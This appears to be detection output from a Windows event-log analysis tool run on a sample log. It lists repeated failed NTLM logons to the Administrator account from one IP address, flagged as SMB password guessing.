2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BJs7tuZpsPMYJHOD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LUT5oe2DwS5vW84K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3OTe0uiDHhf5GzRL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 71TuxFRZFyZEQp1S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xRvTmizOLj3UUpD7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LnQEZPWaN2OkpTLa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HnHR9DAtgzu561sx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DfBl3dbluZ7GiFum  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1Hlgn7gsZwRvlXAk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eyHVPtGpnmmRjJuO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F0l3QC0rLt9yGaIe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XfEng3JgXLmgI8GN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ORIegzlkHy8AX6RW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AzS4xRnHKxSwz5sZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v0hA1XvRIlqwKG6g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mKXKkvlHvjRh33Vw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JIMTGRC5IQlkrG9c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NYcLsxwbg8LkGCuQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kmttijRBtXqEbU0W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DXC3hYI1Gin59gvG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hQiozAIr9Jgklmks  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O598IvZRpbdU1liO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xlmYWrAnn3sUNSRk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0aAAkO0uOGIq8zVM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 26K4BIpgUbBNWbDM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: moW3Ts7edqoQ9XeU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l8C4d3xE0QkWywbf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K1EgYFhtgrcjtcXM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7avpgQeA0KCIme9Z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YFgmt3OEw4cDfPhG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OqITdE5K63nJg9tg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zBs4fYCiprxgDd43  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VtBD0Q2szeURxMYA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KPUi2NhPP92Rs3hy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2PrbMf9E0fOuwIB8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 807zsxQ9WETO9YIp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZGMJKRYUlmijJV40  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xv33to031A0fQzX2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IT0bzycur7HXFeLg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kyY2K7tT0HgQ1ZL3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6aexuFPH6FyEZ1bN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o8Iojas6sznqlYUE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U2SnliYkmx59ACSM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2plWY1GZHilHv5Vh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XIfmqihMJdPVz80p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Odg692Eyde8md0t7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gsQNvf5HkRQnbDul  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: il2DGq3bzfwGuJN4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9OsQFOcIyougrx0E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gR8wpQrGYzd4NrBo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KFjRsjWXbEPs9m1I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wbjudOy3rWefzAIv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1Q4gc8keCTv2HeE3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SmsaxHrHYuofUhAH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CvhWasTJYmChfsNU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DszGfEo9aua2y5UC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lZPScjxczbrcJuvJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ucpjxJV4rBXOxy4e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BmTtDfX05VsKFrON  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HhWSUkQhv089RSfJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i8RXCiXQYgjuPO78  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pfB3u3Np38FOw6hc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I9GcSmto4jdCIw6H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HsogJdHUcldt7JeH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IUbkohKtCy6joOBY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9ZFyYxBrKnz652Co  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QQ2MHr71xALFHJqN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cgjHOgEYRLQiJX75  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QXLjSNCeDAaX4ttQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: np6hwdqnWLJawVn9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: adqqChrYx3lZ0BAa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1GTXkOnNYTws1MiC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5QUvFvCM6AJhKjXe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
